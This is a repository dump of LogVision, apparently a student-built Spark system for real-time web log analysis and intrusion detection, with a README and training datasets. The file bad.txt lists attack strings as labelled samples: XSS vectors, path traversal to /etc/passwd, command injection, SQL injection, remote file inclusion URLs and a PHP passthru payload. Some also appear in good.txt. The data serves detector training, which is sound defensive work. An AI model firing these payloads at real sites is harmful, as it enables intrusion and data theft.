[
  {
    "path": ".gitignore",
    "content": "# Python\n__pycache__/\n*.py[cod]\n*$py.class\n*.so\n.Python\nbuild/\ndevelop-eggs/\ndist/\ndownloads/\neggs/\n.eggs/\nlib/\nlib64/\nparts/\nsdist/\nvar/\nwheels/\n*.egg-info/\n.installed.cfg\n*.egg\nMANIFEST\n.pytest_cache/\n\n# Vue/Node\nnode_modules/\nnpm-debug.log*\nyarn-debug.log*\nyarn-error.log*\n.DS_Store\ndist/\n.env\n.env.local\n.env.*.local\n*.log\nlogs/\n\n# IDE\n.idea/\n.vscode/\n*.suo\n*.ntvs*\n*.njsproj\n*.sln\n*.sw?\n\n# 系统文件\nThumbs.db\nehthumbs.db\nDesktop.ini"
  },
  {
    "path": "README.md",
    "content": "# LogVision / 使用大数据的分布式实时日志分析与入侵检测系统\n\b[开发文档](https://xander-wang.github.io/2020/05/09/logvision/)\n## 版本记录（当前2.0）\n- 2018.12.8 v1.0：原型版本，有bug。\n- 2020.5.9 v2.0：初步完善版本，可以实现预期效果。\n## 问题交流\n- Telegram群组：https://t.me/logv123\n## 简介\nLogVision是一个整合了web日志聚合、分发、实时分析、入侵检测、数据存储与可视化的日志分析解决方案。聚合采用Apache Flume，分发采用Apache Kafka，实时处理采用Spark Streaming，入侵检测采用Spark MLlib，数据存储使用HDFS与Redis，可视化采用Flask、SocketIO、Echarts、Bootstrap。\n\n本文下述的使用方法均面向单机伪分布式环境，你可以根据需求进行配置上的调整以适应分布式部署。\n\n本系统各模块由个人独立开发，期间参考了一些有价值的文献与资料。本系统还是个人的本科毕业设计。\n\n获得的奖项：2019年全国大学生计算机设计大赛安徽省二等奖、2019年安徽省信息安全作品赛二等奖。\n\n[原型版本的介绍视频](https://www.bilibili.com/video/BV1eb411T77r)\n\n## 系统架构\n![arch](https://github.com/xander-wang/logvision/blob/master/images/arch.png)\n## 数据流向\n（数字代表处理步骤）  \n![dataflow](https://github.com/xander-wang/logvision/blob/master/images/dataflow.png)\n## 入侵检测流程\n![idsflow](https://github.com/xander-wang/logvision/blob/master/images/idsflow.png)\n## 项目结构\n- flask：Flask Web后端\n- spark：日志分析与入侵检测的实现\n- flume：Flume配置文件\n- log_gen：模拟日志生成器\n- datasets：测试日志数据集\n- images：README的图片\n## 依赖与版本\n- 编译与Web端需要用到的：\n  - Java 8, Scala 2.11.12, Python 3.8 (包依赖见requirements), sbt 1.3.8\n- 计算环境中需要用到的：\n  - Java 8, Apache Flume 1.9.0, Kafka 2.4, Spark 2.4.5, ZooKeeper 3.5.7, Hadoop 2.9.2, Redis 5.0.8\n## 使用说明\n在开始之前，你需要修改源码或配置文件中的IP为你自己的地址。具体涉及到flume配置文件、Spark主程序、Flask Web后端。 \n### 编译Spark应用\n在安装好Java8与Scala11的前提下，在```spark```目录下，初始化```sbt```：\n```\nsbt\n```  \n退出```sbt shell```并使用```sbt-assembly```对Spark项目进行编译打包：\n```\nsbt assembly\n```\n然后将生成的```jar```包重命名为```logvision.jar```。\n### 环境准备\n你需要一个伪分布式环境（测试环境为CentOS 7），并完成了所有对应版本组件依赖的配置与运行。  \n使用```flume```目录下的```standalone.conf```启动一个Flume Agent。  \n将```datasets```文件夹中的```learning-datasets```提交如下路径：\n```\n/home/logv/learning-datasets\n```\n将```datasets```文件夹中的```access_log```提交如下路径：\n```\n/home/logv/access_log\n```  \n\n### 入侵检测模型训练与测试\n提交```jar```包至Spark集群并执行入侵检测模型的生成与测试：\n```\nspark-submit --class learning logvision.jar\n```\n你将可以看到如下结果：  \n![idoutput](https://github.com/xander-wang/logvision/blob/master/images/idoutput.png)  \n两个表格分别代表正常与异常数据集的入侵检测结果，下面四个表格可用于判断识别准确率。如图中所示250条正常测试数据被检测为250条正常，识别率100%；250条异常测试数据被检测为240条异常，10条正常，准确率96%。\n### 启动可视化后端\n在```flask```目录下执行如下命令，下载依赖包：\n```\npip3 install -r requirements.txt\n```\n启动Flask Web：\n```\npython3 app.py\n```\n### 启动实时日志生成器\n```log_gen```中的实时日志生成器可根据传入参数（每次写入行数、写入间隔时间）将样本日志中的特定行块追加至目标日志中，以模拟实时日志的生成过程，供后续实时处理。  \n```\njava log_gen [日志源] [目标文件] [每次追加的行数] [时间间隔（秒）]\n```\n提交至环境，编译并运行，每2秒将```/home/logv/access_log```文件中的5行追加至```/home/logSrc```中：\n```\njavac log_gen.java\njava log_gen /home/logv/access_log /home/logSrc 5 2\n```\n### 启动分析任务\n提交```jar```包至Spark集群并执行实时分析任务：\n```\nspark-submit --class streaming logvision.jar\n```\n### 查看可视化结果\n至此你已经完成了后端组件的配置，通过浏览器访问Web端主机的```5000```端口可以查看到实时日志分析的可视化结果：  \n欢迎界面：  \n![welcome](https://github.com/xander-wang/logvision/blob/master/images/welcome.png)  \n实时日志分析界面：  \n![analysis](https://github.com/xander-wang/logvision/blob/master/images/analysis.png)  \n实时入侵检测界面：  \n![id](https://github.com/xander-wang/logvision/blob/master/images/id.png)\n"
  },
  {
    "path": "datasets/learning-datasets/testing/bad.txt",
    "content": "<b <script>alert(1)//</script>0</script></b>\n<b><script<b></b><alert(1)</script </b></b>\n<div id=\"div1\"><input value=\"``onmouseover=alert(1)\"></div> <div id=\"div2\"></div><script>document.getElementById(\"div2\").innerHTML = document.getElementById(\"div1\").innerHTML;</script>\n<div style=\"[a]color[b]:[c]red\">XXX</div>\n<div  style=\"\\63&#9\\06f&#10\\0006c&#12\\00006F&#13\\R:\\000072 Ed;color\\0\\bla:yellow\\0\\bla;col\\0\\00 \\&#xA0or:blue;\">XXX</div>\n<!-- IE 6-8 --><x '=\"foo\"><x foo='><img src=x onerror=alert(1)//'><!-- IE 6-9 --><! '=\"foo\"><x foo='><img src=x onerror=alert(2)//'><? '=\"foo\"><x foo='><img src=x onerror=alert(3)//'>\n<embed src=\"javascript:alert(1)\"></embed> // O10.10â, OM10.0â, GC6â, FF<img src=\"javascript:alert(2)\"><image src=\"javascript:alert(2)\"> // IE6, O10.10â, OM10.0â<script src=\"javascript:alert(3)\"></script> // IE6, O11.01â, OM10.1â\n<!DOCTYPE x[<!ENTITY x SYSTEM \"http://html5sec.org/test.xxe\">]><y>&x;</y>\n<svg onload=\"javascript:alert(1)\" xmlns=\"http://www.w3.org/2000/svg\"></svg>\n<?xml version=\"1.0\"?><?xml-stylesheet type=\"text/xsl\" href=\"data:,%3Cxsl:transform version='1.0' xmlns:xsl='http://www.w3.org/1999/XSL/Transform' id='xss'%3E%3Cxsl:output method='html'/%3E%3Cxsl:template match='/'%3E%3Cscript%3Ealert(1)%3C/script%3E%3C/xsl:template%3E%3C/xsl:transform%3E\"?><root/>\n<!DOCTYPE x [\t<!ATTLIST img xmlns CDATA \"http://www.w3.org/1999/xhtml\" src CDATA \"xx:x\" onerror CDATA \"alert(1)\" onload CDATA \"alert(2)\">]><img />\n<doc xmlns:xlink=\"http://www.w3.org/1999/xlink\" xmlns:html=\"http://www.w3.org/1999/xhtml\">\t<html:style /><x xlink:href=\"javascript:alert(1)\" xlink:type=\"simple\">XXX</x></doc>\n<card xmlns=\"http://www.wapforum.org/2001/wml\"><onevent type=\"ontimer\"><go href=\"javascript:alert(1)\"/></onevent><timer value=\"1\"/></card>\n<div style=width:1px;filter:glow onfilterchange=alert(1)>x</div>\n<// style=x:expression\\28write(1)\\29>\n<form><button formaction=\"javascript:alert(1)\">X</button>\n<event-source src=\"event.php\" onload=\"alert(1)\">\n<a href=\"javascript:alert(1)\"><event-source src=\"data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A\" /></a>\n<script<{alert(1)}/></script </>\n<?xml-stylesheet type=\"text/css\"?><!DOCTYPE x SYSTEM \"test.dtd\"><x>&x;</x>\n<?xml-stylesheet type=\"text/css\"?><root style=\"x:expression(write(1))\"/>\n<?xml-stylesheet type=\"text/xsl\" href=\"#\"?><img xmlns=\"x-schema:test.xdr\"/>\n<object allowscriptaccess=\"always\" data=\"test.swf\"></object>\n<style>*{x:ï½ï½ï½ï½ï½ï½ï½ï½ï½ï½(write(1))}</style>\n<x xmlns:xlink=\"http://www.w3.org/1999/xlink\" xlink:actuate=\"onLoad\" xlink:href=\"javascript:alert(1)\" xlink:type=\"simple\"/>\n<?xml-stylesheet type=\"text/css\" href=\"data:,*%7bx:expression(write(2));%7d\"?>\n<x:template xmlns:x=\"http://www.wapforum.org/2001/wml\"  x:ontimer=\"$(x:unesc)j$(y:escape)a$(z:noecs)v$(x)a$(y)s$(z)cript$x:alert(1)\"><x:timer value=\"1\"/></x:template>\n<x xmlns:ev=\"http://www.w3.org/2001/xml-events\" ev:event=\"load\" ev:handler=\"javascript:alert(1)//#x\"/>\n<x xmlns:ev=\"http://www.w3.org/2001/xml-events\" ev:event=\"load\" ev:handler=\"test.evt#x\"/>\n<body oninput=alert(1)><input autofocus>\n<svg xmlns=\"http://www.w3.org/2000/svg\"><a xmlns:xlink=\"http://www.w3.org/1999/xlink\" xlink:href=\"javascript:alert(1)\"><rect width=\"1000\" height=\"1000\" fill=\"white\"/></a></svg>\n<svg xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\"><animation xlink:href=\"javascript:alert(1)\"/><animation xlink:href=\"data:text/xml,%3Csvg xmlns='http://www.w3.org/2000/svg' onload='alert(1)'%3E%3C/svg%3E\"/><image xlink:href=\"data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' onload='alert(1)'%3E%3C/svg%3E\"/><foreignObject xlink:href=\"javascript:alert(1)\"/><foreignObject xlink:href=\"data:text/xml,%3Cscript xmlns='http://www.w3.org/1999/xhtml'%3Ealert(1)%3C/script%3E\"/></svg>\n<svg xmlns=\"http://www.w3.org/2000/svg\"><set attributeName=\"onmouseover\" to=\"alert(1)\"/><animate attributeName=\"onunload\" to=\"alert(1)\"/></svg>\n<!-- Up to Opera 10.63 --><div style=content:url(test2.svg)></div><!-- Up to Opera 11.64 - see link below --><!-- Up to Opera 12.x --><div style=\"background:url(test5.svg)\">PRESS ENTER</div>\n[A]<? foo=\"><script>alert(1)</script>\"><! foo=\"><script>alert(1)</script>\"></ foo=\"><script>alert(1)</script>\">[B]<? foo=\"><x foo='?><script>alert(1)</script>'>\">[C]<! foo=\"[[[x]]\"><x foo=\"]foo><script>alert(1)</script>\">[D]<% foo><x foo=\"%><script>alert(1)</script>\">\n<div style=\"background:url(http://foo.f/f oo/;color:red/*/foo.jpg);\">X</div>\n<div style=\"list-style:url(http://foo.f)\\20url(javascript:alert(1));\">X</div>\n<svg xmlns=\"http://www.w3.org/2000/svg\"><handler xmlns:ev=\"http://www.w3.org/2001/xml-events\" ev:event=\"load\">alert(1)</handler></svg>\n<svg xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\"><feImage><set attributeName=\"xlink:href\" to=\"data:image/svg+xml;charset=utf-8;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciPjxzY3JpcHQ%2BYWxlcnQoMSk8L3NjcmlwdD48L3N2Zz4NCg%3D%3D\"/></feImage></svg>\n<iframe src=mhtml:http://html5sec.org/test.html!xss.html></iframe><iframe src=mhtml:http://html5sec.org/test.gif!xss.html></iframe>\n<!-- IE 5-9 --><div id=d><x xmlns=\"><iframe onload=alert(1)\"></div><script>d.innerHTML+='';</script><!-- IE 10 in IE5-9 Standards mode --><div id=d><x xmlns='\"><iframe onload=alert(2)//'></div><script>d.innerHTML+='';</script>\n<div id=d><div style=\"font-family:'sans\\27\\2F\\2A\\22\\2A\\2F\\3B color\\3Ared\\3B'\">X</div></div><script>with(document.getElementById(\"d\"))innerHTML=innerHTML</script>\nXXX<style>*{color:gre/**/en !/**/important} /* IE 6-9 Standards mode */<!----><!--*{color:red}   /* all UA */*{background:url(xx:x //**/\\red/*)} /* IE 6-7 Standards mode */</style>\n<img[a][b]src=x[d]onerror[c]=[e]\"alert(1)\">\n<a href=\"[a]java[b]script[c]:alert(1)\">XXX</a>\n<img src=\"x` `<script>alert(1)</script>\"` `>\n<script>history.pushState(0,0,'/i/am/somewhere_else');</script>\n<svg xmlns=\"http://www.w3.org/2000/svg\" id=\"foo\"><x xmlns=\"http://www.w3.org/2001/xml-events\" event=\"load\" observer=\"foo\" handler=\"data:image/svg+xml,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%0A%3Chandler%20xml%3Aid%3D%22bar%22%20type%3D%22application%2Fecmascript%22%3E alert(1) %3C%2Fhandler%3E%0A%3C%2Fsvg%3E%0A#bar\"/></svg>\n<iframe src=\"data:image/svg-xml,%1F%8B%08%00%00%00%00%00%02%03%B3)N.%CA%2C(Q%A8%C8%CD%C9%2B%B6U%CA())%B0%D2%D7%2F%2F%2F%D7%2B7%D6%CB%2FJ%D77%B4%B4%B4%D4%AF%C8(%C9%CDQ%B2K%CCI-*%D10%D4%B4%D1%87%E8%B2%03\"></iframe>\n<img src onerror /\" '\"= alt=alert(1)//\">\n<title onpropertychange=alert(1)></title><title title=></title>\n<!-- IE 5-8 standards mode --><a href=http://foo.bar/#x=`y></a><img alt=\"`><img src=xx:x onerror=alert(1)></a>\"><!-- IE 5-9 standards mode --><!a foo=x=`y><img alt=\"`><img src=xx:x onerror=alert(2)//\"><?a foo=x=`y><img alt=\"`><img src=xx:x onerror=alert(3)//\">\n<svg xmlns=\"http://www.w3.org/2000/svg\"><a id=\"x\"><rect fill=\"white\" width=\"1000\" height=\"1000\"/></a><rect  fill=\"white\" style=\"clip-path:url(test3.svg#a);fill:url(#b);filter:url(#c);marker:url(#d);mask:url(#e);stroke:url(#f);\"/></svg>\n<svg xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M0,0\" style=\"marker-start:url(test4.svg#a)\"/></svg>\n/top.php?stuff='|sleep 11 #\n/8t9v8k7x.jspa?<script>document.cookie=\"testhvje=9403;\"</script>\n/prescription/\n../../../../../../../../../../boot.ini\n<script>document.cookie=\"testxllt=9940;\"</script>\n/examples/jsp/checkbox/libraries/adodb/server.php?sql='adodb_sql_sql_injection.nasl\n/ghswfouu.cfc?<meta http-equiv=set-cookie content=\"testsqmm=5713\">\n/u95h6ymu.cgi?<script>document.cookie=\"testkhwc=4028;\"</script>\n/nyjgaorz.idc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/h4bi26jd.mscgi?<script>document.cookie=\"testhrzx=1150;\"</script>\n/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd\n/en-us/w4996nr0.mscgi?<meta http-equiv=set-cookie content=\"testttvs=7163\">\n/opensiteadmin/scripts/classes/form.php?path=http://192.168.202.96:8080/frznctvhi0i5?\\x00\n/recordings/nucleus/libs/pluginadmin.php?globals[dir_libs]=/etc/passwd\\x00\n/ghswfouu.fts?<script>document.cookie=\"testsqmm=5713;\"</script>\n/0rufe52p.htm?<script>cross_site_scripting.nasl</script>\n/manager/forum_2.php?msg=10&return=<script>foo</script>\n/scripts/1332010202-ror_session_fixation.nasl\n/zqqemp6j.aspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/proto.exe\n/awstats/awstats.pl?migrate=|echo;/./tmp/dedvphbiqt.sh;echo|awstats168582.txt\n/examples/jsp/colors/athenareg.php?pass= ;id\n/recordings/index.php?include_files[]=&include_files[query_string]=/etc/passwd\n/apavxugx.dll?<meta http-equiv=set-cookie content=\"testdnbh=5237\">\n/cgi-perl/vssetcookie.exe\n/phpmyadmin/inc/functions.inc.php?config[ppa_root_path]=/etc/passwd\\x00\n/help.php?q=\"&ver\\x09>q66374774&rem\\x09\n/gvx7m5ti.asp?<meta http-equiv=set-cookie content=\"testwldz=3506\">\n/cgi-bin/sawmillcl.exe?ho+{complete_version}\n/cgi-bin/cal_make.pl?p0=../../../../../../../../../etc/passwd\\x00\n/main.php?logout=\"uname\\x09#\n/ap58k3ci.kspx?<script>cross_site_scripting.nasl</script>\n/examples/jsp/colors/directorypro.cgi?want=showcat&show=../../../../../etc/passwd\\x00\n/sourceforgesubscriptions_final/\n/nuh3zirz.cfm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/bmeun223.exe?<script>document.cookie=\"testhhwu=7044;\"</script>\n/examples/jsp/colors/btdownload.php?type=torrent&file=../../../../../../../../../../etc/passwd\n/en-us/fo564rei.jsp?<script>cross_site_scripting.nasl</script>\n/cgi.cgi/c32web.exe/changeadminpassword\n/help.php?q=ping;-w;10000;-n;1;1.2.3.4&rem;\n/examples/jsp/num/resetpw.php?email=../../../../../../../../../../../../etc/passwd\n/oie504mr.html?<script>document.cookie=\"testtpby=7052;\"</script>\n/examples/jsp/colors/lib/authform.inc.php?path_pre=/etc/passwd\\x00\n/main.php?stuff=\"&del\\x09q89486418&rem\\x09\n/archive.php?scriptpath=http://192.168.202.118:8080/ghl9il??\n/examples/jsp/cal/adodb-perf-module.inc.php?last_module=zzz_adoconnection{}system(id);class zzz_adoconnection{}//\n/examples/jsp/cal/lib/owl_api.php?xrms_file_root=../../../../../../../../../../../../etc/passwd\\x00\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\";ls+-l;rm+/tmp/yrxsovftek\"\n/examples/servlets/servlet/js/scripts.php?load=/etc/passwd\\x00\n//../../../../../../../../windows/win.ini\n/javascript/manifest.exe\n/msadm/site/index.php3?authid=\\\"><script>alert('vulnerable')</script>\n/help.php?q=;uname\\x09#\n/top.php?stuff='&rm q76213281 #\n/opensiteadmin/scripts/classes/formmanager.php?path=http://cirt.net/rfiinc.txt?\\x00\n/demo/ms-pe02/catalog.php?cid=0&sid='\"&sortfield=title&sortorder=asc&pagenumber=1&main=http://192.168.202.96:8080/llumt7msyau5y?&\n/4&#215;4/\n/main.php?stuff=\"ping\\x0b-w\\x0b11000\\x0b-n\\x0b1\\x0b1.2.3.4&rem\\x0b\n/dda2qr7j.exe?<script>cross_site_scripting.nasl</script>\n/main.php?frm_daynight=day&frm_passwd=&frm_referer=http%3a//192.168.24.202/&frm_user=&scr_height=&scr_width=q13664242\n/scripts/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1331919008,1645922045 -- \n/main.php?logout='&del\\x09q59435268\\x09#\n/en-us/account/print.php?what=article&id='\n/examples/jsp/error/minis.php?month=../../../../../../etc/passwd\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+echo+w+0+>>ctdn\n/recordings/ncbook.cgi?action=default&current=|cat /etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10\n/examples/servlets/servlet/index.php?act=arcade&do=stats&gameid=1'\n/scripts/check-lom.php?etcdir=http://cirt.net/rfiinc.txt?\n/javascript/document.key\n/h5sc3gxy.dll?<script>cross_site_scripting.nasl</script>\n/?<meta http-equiv=set-cookie content=\"testbfpq=3326\">\n/javascript/vbs.exe\n/scripts/c0kha6w3apd3.shtml\n/egaet53a.html?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/ibill.pm\n/nuh3zirz.nsf?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/googlesearch/googlesearch.php?app[path][lib]=/etc/passwd\\x00\n<meta http-equiv=set-cookie content=\"testiklc=904\">\n/1qwv2p5p.do?<script>document.cookie=\"testvqcy=252;\"</script>\n/main.php?logout=\"&ping\\x0b-w\\x0b8000\\x0b-n\\x0b1\\x0b4.3.2.1&rem\\x0b\n/javascript/oauth.exe\n/jujgxwav.fts?<script>document.cookie=\"testknim=9383;\"</script>\n/scripts/minis.php?month=../../../../../../etc/passwd\n/fastscripts/\n//<body><script src=http://www.example.com/test?rnd=q81315649></script>\n/ygkjkngd.php?<meta http-equiv=set-cookie content=\"testnago=4518\">\n/main.php?stuff=\"rm,q47628643&rem,\n/examples/jsp/num/smpwservicescgi.exe\n/vhzmaia2.html?<meta http-equiv=set-cookie content=\"testkogj=3979\">\n/hjdzm96v.jsp?<script>document.cookie=\"testbyqe=7474;\"</script>\n/zroo33l4.asp?<meta http-equiv=set-cookie content=\"testiklc=904\">\n/main.php?stuff=\"\\x0duname #\n/searchsimple.php?searwords=<script>alert(412225577702)</script>&send=search\n/fo564rei.cgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/script-r0/\n/examples/jsp/sessions/mlog.html?screen=/etc/passwd\n/opensiteadmin/scripts/classes/fieldmanager.php?path=http://192.168.202.96:8080/llumt7msyau5y?\\x00\n/javascript/encode.exe\n/en-us/7o5qp766.nsf?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/d44uk9h2.idc?<meta http-equiv=set-cookie content=\"testmybc=2088\">\n/weq93ppb.fts?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/nyjgaorz.htm?<script>cross_site_scripting.nasl</script>\n/eguestproxsssql/\n/scripts/admin/connect.inc\n/<meta http-equiv=set-cookie content=\"testtfvh=2141\">\n/examples/jsp/num/forumdisplay.php?fid=21\"><script>x</script>\n/scripts/search.jsp?q=%\"<script>alert(1332010391)</script>\n/cgi-bin/csguestbook.cgi?command=savesetup&setup=;system('cat /etc/passwd')\n/include/scripts/run_auto_suspend.cron.php?dir=http://cirt.net/rfiinc.txt?\n/vac1l5vm.pl?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/servlets/servlet/shopexd.asp?catalogid='42\n/javascript/.passwd.jar\n/cgi-bin/blog.cgi?submit=viewfile&month=01&year=2004&file=|cat /etc/passwd|\n/rpxyx07v.jsp?<script>document.cookie=\"testbnli=1975;\"</script>\n/0rufe52p.jsp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/phpmyadmin/sugarcrm/modules/users/login.php?theme=../../../../../../../etc/passwd\\x00\nftp://192.168.24.202/*<apache_mod_proxy_ftp_glob_xss.nasl>\n/vjbrrppi.cfc?<script>cross_site_scripting.nasl</script>\n/javascript/phpbb.exe\n/static//.../.../.../.../.../.../.../.../windows/win.ini\n/javascript/htpasswd.key\n/weq93ppb.x?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/shipped.exe\n/cgi-bin/base_local_rules.php?dir=<script>alert('base_local_rules_xss.nasl-1331918989')</script>\n/wiki.php/<script>foo</script>\n/examples/jsp/error/login.php?lang=/../../../../../../../../../../../../etc/passwd\\x00.txt\n/javascript/trash.exe\n/yver8r9o.php3?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/manager/nessus\"><script>alert('django_admin_xss.nasl')</script>/\n/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=http://192.168.202.96:8080/frznctvhi0i5??\n/jackrabbit/search.jsp?q=%\"<script>alert(1331904374)</script>\n/main.php?g2_view=zipcart.download&g2_file=../../../../../../../../../../../../etc/passwd\n/0qhcnefz.htm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/7dbjwpw6.php?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/servlets/servlet/cwmail.exe\n/examples/jsp/colors/starnet/addons/slideshow_full.php?album_name='1914620104\n/jnt3f86c.asp?<meta http-equiv=set-cookie content=\"testcmax=9270\">\n/manager/www/delivery/ac.php?bannerid=-1331904368+or+1=1+--+';passthru(base64_decode($_server[http_nessus_wk4aztya]));die;/*\n/6dlc2zm9.jsp?<meta http-equiv=set-cookie content=\"testqpux=4016\">\n/examples/jsp/checkbox/simple/view_page?mv_arg=|cat /etc/passwd|\n/cacti/base_qry_common.php?base_path=/etc/passwd\\x00\n/recordings/index.php?gadget=glossary&action=view&term=<script>alert('jaws_xss.nasl');</script>\n/cacti/search.cgi?..\\..\\..\\..\\..\\..\\windows\\win.ini\n/0u75ldxq.htm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/top.php?stuff=\"&ping\\x0c-w\\x0c7000\\x0c-n\\x0c1\\x0c1.2.3.4&rem\\x0c\n/?<meta http-equiv=set-cookie content=\"testulex=4996\">\n/main.php?stuff=;uname >q81835212 #\n/main.php?stuff=\"ping -w 9000 -n 1 1.2.3.4&rem \n/javascript/webmail.exe\n/ripscript/\n/examples/jsp/jsp2/el/directorypro.cgi?want=showcat&show=../../../../../etc/passwd\\x00\n/help.php?q=ping;-w;7000;-n;1;1.2.3.4|rem;\n/www/delivery/ac.php?bannerid=-1331909226+or+1=1+--+';passthru(base64_decode($_server[http_nessus_1wubmpss]));die;/*\n/3hlysl2x.kspx?<script>document.cookie=\"testgjbe=8505;\"</script>\n/main.php?stuff=&ver\\x09>q65268393&rem\\x09\n/examples/jsp/jsp2/el/index.php?show=../../../../../../../../../../../etc/passwd\\x00\n/5qnlm5z2.php3?<meta http-equiv=set-cookie content=\"testsixi=8451\">\n/bxnyrhmh.php3?<script>document.cookie=\"testmjct=1867;\"</script>\n/cacti/pjreview_neo.cgi?p=../../../../../../../../../../etc/passwd\n/5o9zq43e.asp?<script>cross_site_scripting.nasl</script>\n/yver8r9o.php?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/ajax.php?rs=__exp__getfeedcontent&rsargs[]=-99 union select 911180970,2,397451365,4,5,6,7,8,9,0,1,2,3 --\n/interface/login/login_frame.php?site=<script>alert(owasp zap);</script>' and '1'='1\n/help.php?q=\"\\x0duname\\x09>q41994252\\x09#\n/cacti/lang/lang.php?lang_path=/etc/passwd\\x00\n/ghostscript/\n/ybz5rz7a.asp?<script>document.cookie=\"testsbvw=6289;\"</script>\n/auth-passwd/\n/606wkcop.htm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/top.php?stuff='&sleep\\x0910\\x09#\n/t_scriptrap/\n/examples/jsp/num/hw3.cgi?daysonly=0).system('id').(\n/7o5qp766.cgi?<script>cross_site_scripting.nasl</script>\n/index.php?id='\n/misc/audio.php?recording=../version.inc\n/main.php?stuff=\"ver&rem\\x0c\n/xoops232b/htdocs/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}system('chmod+777+/tmp/fphgokkkuu.sh'); function v\n/phpmyadmin/calendar_admin.pl?config=|cat /etc/passwd|\n/base_local_rules.php?dir=<script>alert('base_local_rules_xss.nasl-1331904208')</script>\n/cgi-bin/index.php?x=browse&category='union select '1','2','pixelpost_category_sql_injection.nasl','1331919219','5'--\n/p043snfr.cgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/login.php?procesa=si&usuario_nkads_admin=' or isnull(1/0)/*\n/h5sc3gxy.nsf?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/d44uk9h2.x?<meta http-equiv=set-cookie content=\"testmybc=2088\">\n/javascript/www1.exe\n/recordings/styles.php?toroot=/etc/passwd\\x00\n/note.txt?f_notini=&t_note=&nomentreprise=blah&filenote=../../windows/win.ini\n/fo564rei.idc?<script>cross_site_scripting.nasl</script>\n/0w155a7c.idc?<script>cross_site_scripting.nasl</script>\n/xoops232b/htdocs/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}system('chmod+777+/tmp/augpuxhmyg.sh'); function v\n/header_noscript/\n/..\\..\\\\..\\..\\\\..\\..\\\\..\\..\\boot.ini\n/examples/jsp/jsp2/jspx/sgdynamo.exe?htname=sgdynamo.exe\n/raanw4ia.exe?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/main.php?logout='del q43392461 #\n/examples/jsp/error/gotopage.cgi?4242+../../../../../../../../../../../../../etc/passwd"
  },
  {
    "path": "datasets/learning-datasets/testing/good.txt",
    "content": "/jan carbon - creamfields/\n/javascript/ns.sh\n/uhs reader v6/\n/warez-downloads/\n/issue10-news6/\n/000044486/\n/ncsspanish/\n/145392/\n/438085596epeigc_th/\n/gr2006110301296/\n/javascript/tcl.java\n/powhome/\n/foxy_information/\n/complaincheck/\n/bloodmoon/\n/newingames/\n/javascript/templates.sh\n/javascript/env.err\n/javascript/apple.jsp\n/room/save_item.php\n/hurrflood_l/\n/view_172/\n/000095927/\n/pressreleases24/\n/pyamazon/\n/4351660/\n/content/content.php?fileloc=http://192.168.202.96:8080/frznctvhi0i5??\n/topnav_10/\n/rfdump-1/\n/rx7hh71uzqi/\n/logopcmag/\n/kijijilogo_26x13/\n/aboutefa/\n/index85465/\n/unreal/\n/1704toc/\n/455007/\n/15_11a/\n/bolkestein/\n/162099/\n/javascript/tip.cpp\n/1463_thumb stripyhat/\n/dvdfab platinum 2/\n/class.mysql.php?path_to_bt_dir=http://192.168.202.118:8080/iroy1gvqrrqu?\n/5099076/\n/r36w71hyn09xx/\n/susandelucanyt/\n/20030407/\n/4087505/\n/costers/\n/141234/\n/rfc2518/\n/lib/smarty/smartyfu.class.php?system[smarty][dir]=http://cirt.net/rfiinc.txt??\n/fairly/\n/javascript/it.cfm\n/000118956/\n/gobblet/\n/107170/\n/262818/\n/8122rca/\n/thinkingaloud/\n/mzk1mdu6ntoznq/\n/hjmccmrd\n/10509770/\n/blizkrieg/\n/1154741/\n/20060302-1/\n/intentionality/\n/redirect_cnews/\n/javascript/technology.mdb\n/examples/jsp/sessions/search?q=http://www.nessus.org/\n/file_fuzzers/\n/044925/\n/q52586735\n/usgraham110206ind/\n/sudoku-solver/\n/jihad7chap1/\n/up70dark/\n/alticity/\n/550983566ymtadz/\n/om51dr/\n/singertreadle/\n/native2/\n/savagethebattlefornewerthv2/\n/msaccess/\n/bmp/setconn.jsp\n/javascript/imp.vbs\n/marisa/\n/general_electric/\n/press7/\n/ac67226ed451990431f317a88b31933f/\n/nwqthhrld/\n/eestor_ultracap/\n/javascript/excalibur.java\n/slet-j/\n/javascript/synced.nsf\n/do the crawl/\n/javascript/pages.meta\n/a0034773/\n/cnc_pred1/\n/c77bfd/\n/default_fr/\n/img_3909159/\n/donkey kong bongo 